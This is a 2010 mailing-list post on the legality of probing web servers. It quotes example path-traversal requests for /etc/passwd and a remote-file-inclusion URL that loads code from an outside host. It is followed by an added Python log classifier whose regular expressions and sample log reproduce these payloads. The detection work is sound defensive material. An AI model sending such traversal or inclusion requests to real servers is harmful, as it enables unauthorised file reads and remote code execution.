Being safe on the internet (was Re: Here we go again - ISP DPI, but is it interception?)

James Firth james2 at jfirth.net
Thu Aug 5 08:14:11 BST 2010


Jon Ribbens wrote:
> Personally, I think that (attempting to) access http://example.com/
> or http://example.com/../ shows little-to-no evidence of knowingly
> attempting to access unauthorised data. If however, as is seen
> commonly, someone attempts to access something like
> http://example.com/../../../etc/passwd or
> http://example.com/index.php?include=http://1.2.3.4/hax0r.inc
> or similar, then the user is quite blatantly attempting unauthorised
> access and can most certainly be regarded as a criminal.

I see attacks on my servers on a daily basis - literally.

As you perhaps hinted, the intent can best be shown through a sustained
attack, and this in probably all cases is script-driven.

So - a machine-driven attack containing hundreds and usually thousands of
requests across various known vulnerabilities is a clear line.
Unfortunately such attacks usually come from compromised machines, although
I'm possibly in breach of the law even going back to the source IP to
establish whether it's been compromised using any well-known method.

In my view attempting to exploit any one or more of the vulnerabilities "by
hand" using mainstream commercial tools should not be actionable.

James Firth
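
The distinction drawn in this thread, between a single odd request and a sustained scripted run across several known vulnerability classes, can be checked against a web server access log. The following is an added example, not part of the original post; the thresholds, the regular expressions and the constructed log lines are assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Request shapes named in the thread. Assumption: a lone "/../" is not counted,
# only repeated traversal, and a remote URL passed as a parameter value.
PATTERNS = {
    "traversal": re.compile(r"(?:\.\./){2,}"),
    "remote_include": re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I),
}
# Common Log Format prefix: client address, then the request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)')

def classify(lines, min_requests=100, min_kinds=2):
    """Per source IP: (verdict, matching request count, pattern kinds seen)."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), unquote(m.group(2))  # decode %2e%2e etc.
        for kind, rx in PATTERNS.items():
            if rx.search(target):
                hits[ip][kind] += 1
    verdicts = {}
    for ip, kinds in hits.items():
        total = sum(kinds.values())
        # Assumed rule: many requests AND more than one vulnerability class.
        sustained = total >= min_requests and len(kinds) >= min_kinds
        verdicts[ip] = ("sustained-scan" if sustained else "isolated-probe",
                        total, sorted(kinds))
    return verdicts

def sample_log():
    """Constructed log lines using documentation-range addresses."""
    fmt = '{ip} - - [05/Aug/2010:08:00:00 +0100] "GET {path} HTTP/1.1" 404 0'
    lines = [fmt.format(ip="192.0.2.10", path="/../"),
             fmt.format(ip="198.51.100.7", path="/../../../etc/passwd")]
    for i in range(150):
        path = ("/a%d/../../../etc/passwd" % i if i % 2
                else "/index.php?include=http://192.0.2.99/x%d.inc" % i)
        lines.append(fmt.format(ip="203.0.113.5", path=path))
    return lines

if __name__ == "__main__":
    for ip, verdict in sorted(classify(sample_log()).items()):
        print(ip, verdict)
```

A "sustained-scan" verdict says only that the source sent many matching requests; as the post notes, such sources are usually compromised machines.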




More information about the ukcrypto mailing list